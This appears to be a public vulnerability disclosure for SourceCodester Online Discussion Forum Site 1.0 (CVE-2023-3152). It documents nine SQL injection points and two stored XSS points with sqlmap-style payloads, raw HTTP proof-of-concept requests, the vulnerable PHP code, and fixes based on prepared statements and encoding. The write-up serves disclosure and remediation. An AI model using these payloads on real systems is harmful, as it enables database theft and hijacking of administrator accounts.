CVE-2023-3152: Vulnerability/Online Discussion Forum Site - multiple vulnerabilities.md at main · Peanut886/Vulnerability
A vulnerability classified as critical has been found in SourceCodester Online Discussion Forum Site 1.0. It affects the `id` parameter of the file admin\posts\view_post.php (item 5 below; the same pattern recurs in the other files listed). The manipulation leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231021 was assigned to this vulnerability.
**Exploit Title:** Online Discussion Forum Site - multiple vulnerabilities
**Date:** 2023-06/07
**Exploit Author:** Peanut886
**Vendor Homepage:** https://www.sourcecodester.com
**Software Link:** https://www.sourcecodester.com/download-code?nid=15337&title=Online+Discussion+Forum+Site+in+PHP%2FOOP+Free+Source+Code
**Version:** 1.0
**Tested on:** Windows 10 + phpStudy

**1. SQL injection vulnerability in posts\view_post.php**
Sample request POC #1 (error-based payload produced by sqlmap; the `id` value is `1' OR (SELECT ...) AND 'wAaE'='wAaE`, URL-encoded)

```
http://odfs.com/?p=posts/view_post&id=1%27%20OR%20(SELECT%205314%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(5314=5314,1))),0x7176787a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27wAaE%27=%27wAaE
```

The injected subquery is the classic MySQL duplicate-key trick: `CONCAT(0x71627a6a71, (SELECT ELT(5314=5314,1)), 0x7176787a71, FLOOR(RAND(0)*2))` is used as a `GROUP BY` key over `INFORMATION_SCHEMA.PLUGINS`, `RAND(0)` makes the key collide, and MySQL aborts with `Duplicate entry 'qbzjq1qvxzq1' for key 'group_key'`. The two hex constants decode to the markers `qbzjq` and `qvxzq`; sqlmap looks for them in the error text and reads whatever the inner `SELECT` evaluated to (here `1`) from between them. The technique therefore only works when the database error message is reflected into the HTTP response; the same check expression is reused in POC #2, #4, #5 and #6 with different markers.
Sqlmap running results #1
Related Codes posts\view_post.php

```php
<?php
// posts/view_post.php (vulnerable): $_GET['id'] is interpolated straight into
// the SQL string, so a single quote in id closes the literal and the rest of
// the parameter is executed as SQL.
if(isset($_GET['id'])){
    $qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
    if($qry->num_rows > 0){
        // every named column of the row becomes a PHP variable ($title, $content, ...)
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;
            }
        }
    }else{
        echo '<script> alert("Post ID is not recognized."); location.replace("./p=posts");</script>';
    }
}else{
    echo '<script> alert("Post ID is required"); location.replace("./p=posts");</script>';
}
?>
```
**2. SQL injection vulnerability in user\manage_user.php**
Sample request POC #2 (same error-based technique as POC #1, markers `0x71627a6a71` / `0x716b766b71`)

```
http://odfs.com/?p=user/manage_user&id=1%27%20OR%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(6959=6959,1))),0x716b766b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xbbY%27=%27xbbY
```
Sqlmap running results #2
Related Codes user\manage_user.php

```php
<?php
// user/manage_user.php (vulnerable): unescaped $_GET['id'] in the WHERE clause
if(isset($_GET['id'])){
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>
```
**3. SQL injection vulnerability in posts\manage_post.php**
Sample request POC #3 (time-based blind payload: `SLEEP(5)` inside a derived table; a response delayed by about five seconds confirms the injection. The query below also filters on the session user's id, so this request has to be sent from a logged-in user session.)

```
http://odfs.com/?p=posts/manage_post&id=1%27%20AND%20(SELECT%201667%20FROM%20(SELECT(SLEEP(5)))KDHo)%20AND%20%27yeqR%27=%27yeqR
```
Sqlmap running results #3
Related Codes posts\manage_post.php

```php
<?php
// posts/manage_post.php (vulnerable): $_GET['id'] is interpolated unescaped;
// the user_id condition only restricts which rows are returned, not what SQL runs.
if(isset($_GET['id'])){
    $qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' and user_id = '{$_settings->userdata('id')}'");
    if($qry->num_rows > 0){
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;
            }
        }
    }
}
?>
```
**4. SQL injection vulnerability in admin\user\manage_user.php**
Sample request POC #4 (same error-based technique as POC #1, markers `0x71766b6a71` / `0x71786b7a71`)

```
http://odfs.com/?p=admin/user/manage_user&id=1%27%20OR%20(SELECT%204186%20FROM(SELECT%20COUNT(*),CONCAT(0x71766b6a71,(SELECT%20(ELT(4186=4186,1))),0x71786b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27RAfl%27=%27RAfl
```
Sqlmap running results #4
Related Codes admin\user\manage_user.php

```php
<?php
// admin/user/manage_user.php (vulnerable): identical to user/manage_user.php
if(isset($_GET['id'])){
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>
```
**5. SQL injection vulnerability in admin\posts\view_post.php** (the file named in CVE-2023-3152 / VDB-231021)
Sample request POC #5 (same error-based technique as POC #1, markers `0x7162627671` / `0x716a6a7871`)

```
http://odfs.com/?p=admin/posts/view_post&id=1%27%20OR%20(SELECT%203303%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627671,(SELECT%20(ELT(3303=3303,1))),0x716a6a7871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27DgHr%27=%27DgHr
```
Sqlmap running results #5
Related Codes admin\posts\view_post.php

```php
<?php
// admin/posts/view_post.php (vulnerable): same code as posts/view_post.php,
// $_GET['id'] interpolated unescaped into the query
if(isset($_GET['id'])){
    $qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
    if($qry->num_rows > 0){
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;
            }
        }
    }else{
        echo '<script> alert("Post ID is not recognized."); location.replace("./p=posts");</script>';
    }
}else{
    echo '<script> alert("Post ID is required"); location.replace("./p=posts");</script>';
}
?>
```
**6. SQL injection vulnerability in admin\posts\manage_post.php**
Sample request POC #6 (same error-based technique as POC #1, markers `0x7162716a71` / `0x7162706a71`)

```
http://odfs.com/?p=admin/posts/manage_post&id=1%27%20OR%20(SELECT%206705%20FROM(SELECT%20COUNT(*),CONCAT(0x7162716a71,(SELECT%20(ELT(6705=6705,1))),0x7162706a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xWgO%27=%27xWgO
```
Sqlmap running results #6
Related Codes admin\posts\manage_post.php

```php
<?php
// admin/posts/manage_post.php (vulnerable): like posts/manage_post.php but
// without the user_id restriction, so any post id can be loaded
if(isset($_GET['id'])){
    $qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;
            }
        }
    }
}
?>
```
**7. SQL injection vulnerability in admin\categories\view_category.php**
Sample request POC #7 (the baseline request handed to sqlmap; the injection point is the `id` parameter, shown here with the benign value `4`. The file is requested directly rather than through the admin front controller, and the excerpt below does nothing beyond `require_once('../../config.php')` before running the query.)

```http
GET /admin/categories/view_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

```
Sqlmap running results #7
Related Codes admin\categories\view_category.php

```php
<?php
require_once('../../config.php');
// admin/categories/view_category.php (vulnerable): the `> 0` check does not
// stop a string such as 1' ... from reaching the interpolated query
if(isset($_GET['id']) && $_GET['id'] > 0){
    $qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=$v;
        }
    }
}
?>
```
**8. SQL injection vulnerability in admin\categories\manage_category.php**
Sample request POC #8 (baseline request for sqlmap; the injection point is again the `id` parameter, shown with the benign value `4`)

```http
GET /admin/categories/manage_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

```
Sqlmap running results #8
Related Codes admin\categories\manage_category.php

```php
<?php
require_once('../../config.php');
// admin/categories/manage_category.php (vulnerable): identical to view_category.php
if(isset($_GET['id']) && $_GET['id'] > 0){
    $qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=$v;
        }
    }
}
?>
```
**9. SQL injection vulnerability in classes\Users.php (POST, f=registration)**
Sample request POC #9 (baseline registration request with benign values; the code below shows that the `username` and `id` fields are interpolated unescaped after `extract($_POST)`)

```http
POST /classes/Users.php?f=registration HTTP/1.1
Host: odfs.com
Content-Length: 857
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWVcezwGAZd9UURw7
Origin: http://odfs.com
Referer: http://odfs.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="firstname"

1
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="middlename"

22
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="lastname"

33
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="username"

123
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="password"

321
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryWVcezwGAZd9UURw7--
```
Sqlmap running results #9
Related Codes classes\Users.php (POST) — excerpt of the `registration()` method

```php
function registration(){
    if(!empty($_POST['password']))
        $_POST['password'] = md5($_POST['password']);
    else
        unset($_POST['password']);
    // extract() turns every POST field into a local variable, including $username and $id
    extract($_POST);
    $data = "";
    // both $username and $id are interpolated unescaped; a leading-numeric string
    // such as 1' ... still satisfies `$id > 0`
    $check = $this->conn->query("SELECT * FROM `users` where username = '{$username}' ".($id > 0 ? " and id!='{$id}'" : "")." ")->num_rows;
    if($check > 0){
        $resp['status'] = 'failed';
        $resp['msg'] = 'Username already exists.';
        return json_encode($resp);
    }
    // ... rest of registration() not shown
}
```
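For comparison, the same lookups written with mysqli prepared statements, as an added example that is not the project's code: it covers the `id` lookups of items 1 to 8 and the registration uniqueness check of item 9. It assumes `$conn` is the project's mysqli handle and that mysqlnd is available (for `get_result()`); the function names `clean_id`, `fetch_one`, `fetch_post`, `fetch_own_post`, `fetch_user`, `fetch_category` and `username_taken` are illustrative.

```php
<?php
// Added example, not code from the Online Discussion Forum Site project.
// Assumptions: $conn is the project's mysqli handle, mysqlnd is present
// (needed for mysqli_stmt::get_result()), function names are illustrative.

/** Accept only a positive integer id; "1' OR ...", "" and null all yield null. */
function clean_id($raw): ?int {
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

/** Run a prepared statement and return the first row as an assoc array, or null. */
function fetch_one(mysqli $conn, string $sql, string $types, ...$params): ?array {
    $stmt = $conn->prepare($sql);
    $stmt->bind_param($types, ...$params);   // values travel separately from the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/** posts/view_post.php and admin/posts/view_post.php (items 1 and 5). */
function fetch_post(mysqli $conn, $raw_id): ?array {
    $id = clean_id($raw_id);
    if ($id === null) return null;
    return fetch_one($conn,
        "SELECT p.*, u.username, u.avatar, c.name AS `category`
           FROM `post_list` p
           INNER JOIN `category_list` c ON p.category_id = c.id
           INNER JOIN `users` u ON p.user_id = u.id
          WHERE p.id = ?", 'i', $id);
}

/** posts/manage_post.php (item 3): additionally scoped to the logged-in user. */
function fetch_own_post(mysqli $conn, $raw_id, int $user_id): ?array {
    $id = clean_id($raw_id);
    if ($id === null) return null;
    return fetch_one($conn, "SELECT * FROM `post_list` WHERE id = ? AND user_id = ?", 'ii', $id, $user_id);
}

/** user/manage_user.php and admin/user/manage_user.php (items 2 and 4). */
function fetch_user(mysqli $conn, $raw_id): ?array {
    $id = clean_id($raw_id);
    if ($id === null) return null;
    return fetch_one($conn, "SELECT * FROM `users` WHERE id = ?", 'i', $id);
}

/** admin/categories/view_category.php and manage_category.php (items 7 and 8). */
function fetch_category(mysqli $conn, $raw_id): ?array {
    $id = clean_id($raw_id);
    if ($id === null) return null;
    return fetch_one($conn, "SELECT * FROM `category_list` WHERE id = ?", 'i', $id);
}

/**
 * classes/Users.php registration (item 9): inputs are read by name instead of
 * extract($_POST), so a crafted field can neither reach the SQL text nor
 * overwrite a local such as $id.
 */
function username_taken(mysqli $conn, string $username, $raw_id = null): bool {
    $id = clean_id($raw_id);
    $row = $id === null
        ? fetch_one($conn, "SELECT COUNT(*) AS n FROM `users` WHERE username = ?", 's', $username)
        : fetch_one($conn, "SELECT COUNT(*) AS n FROM `users` WHERE username = ? AND id != ?", 'si', $username, $id);
    return (int) $row['n'] > 0;
}

// Usage in place of the original view_post.php block. Columns are copied into
// named variables rather than via `$$k = $v`, which turned every column of the
// result row into a PHP variable in the page's scope.
$post = fetch_post($conn, $_GET['id'] ?? null);
if ($post === null) {
    echo '<script>alert("Post ID is not recognized."); location.replace("./?p=posts");</script>';
    exit;
}
$title   = $post['title'];
$content = $post['content'];
```

With `bind_param`, the value of `id` is sent to MySQL as a typed parameter, so `1' OR (SELECT ...)` can never alter the statement; `clean_id` additionally rejects it before any query runs, which also removes the `$_GET['id'] > 0` string comparison of items 7 and 8. The registration version keeps the original behaviour (an optional `id` excludes the user's own row) without letting either field touch the SQL text.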
**10. XSS vulnerability in admin\posts\manage_post.php (title)**

The payload is submitted through the user-side post editor (Referer `/?p=posts/manage_post`) to `classes/Master.php?f=save_post`, stored with the post, and rendered unescaped when an administrator opens that post in admin\posts\manage_post.php, i.e. a stored XSS against the admin account.
Sample request POC #10

```http
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 602
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywn2OqIAtW9RRog2w
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="id"


------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="title"

11<script>alert(111)</script>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="category_id"

4
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="content"

<p>asd</p>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarywn2OqIAtW9RRog2w--
```
Sample response results #10
Related Codes admin\posts\manage_post.php (title)

```php
<!-- $title is echoed into the value attribute without htmlspecialchars() -->
<div class="form-group">
    <label for="title" class="control-label">Title</label>
    <input type="text" class="form-control rounded-0" name="title" id="title" value="<?= isset($title) ? $title : "" ?>">
</div>
```
**11. XSS vulnerability in admin\posts\manage_post.php (content)**

Same path as item 10, with the payload in the `content` field; it is echoed unescaped into the textarea of the admin edit form.
Sample request POC #11

```http
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 605
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTTVOK61sOtujLolB
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close

------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="title"

111
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="category_id"

4
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="content"

<script>alert(123)</script>
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryTTVOK61sOtujLolB--
```
Sample response results #11
Related Codes admin\posts\manage_post.php (content)

```php
<!-- $content is echoed into the textarea body without htmlspecialchars(), so a
     </textarea><script>... payload or the bare <script> above runs on the admin's page -->
<div class="form-group">
    <label for="content" class="control-label">Content</label>
    <textarea type="text" class="form-control rounded-0" name="content" id="content"><?= isset($content) ? $content : "" ?></textarea>
</div>
```
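An added example, not the project's code, showing the two sinks of items 10 and 11 with output encoding applied. `$title` and `$content` stand for the values loaded by admin\posts\manage_post.php; the helper names `e()` and `render_post_form()` are illustrative.

```php
<?php
// Added example (not from the Online Discussion Forum Site project): output
// encoding for the title attribute and the content textarea of
// admin/posts/manage_post.php. Helper names are illustrative.

/** HTML-encode a value for insertion into element text or a quoted attribute. */
function e($v): string {
    // ENT_QUOTES: both ' and " are encoded, so a value cannot close the attribute.
    // ENT_SUBSTITUTE: malformed UTF-8 is replaced instead of making the call
    // return "" (which would silently drop the data).
    return htmlspecialchars((string) $v, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** The edit form with both sinks encoded; returns the markup as a string. */
function render_post_form(?string $title, ?string $content): string {
    return '<div class="form-group">'
         . '<label for="title" class="control-label">Title</label>'
         . '<input type="text" class="form-control rounded-0" name="title" id="title" value="' . e($title ?? '') . '">'
         . '</div>'
         . '<div class="form-group">'
         . '<label for="content" class="control-label">Content</label>'
         . '<textarea class="form-control rounded-0" name="content" id="content">' . e($content ?? '') . '</textarea>'
         . '</div>';
}

// Worked check with the payloads from POC #10 and #11 (constructed input):
echo render_post_form('11<script>alert(111)</script>', '<script>alert(123)</script>');
// The title payload is emitted as
//   value="11&lt;script&gt;alert(111)&lt;/script&gt;"
// and the content payload inside the textarea as
//   &lt;script&gt;alert(123)&lt;/script&gt;
// The browser decodes the entities when it fills the field, so the editor still
// shows the text the user typed, but no script element is created.
```

Encoding inside the textarea loses nothing: the editor legitimately submits HTML (POC #10 sends `<p>asd</p>` as content), and after entity decoding the field holds exactly that HTML again. Wherever the forum renders post content as HTML rather than inside a form field, `htmlspecialchars()` is the wrong tool and an allowlist sanitizer is needed instead, since the markup is meant to be interpreted there.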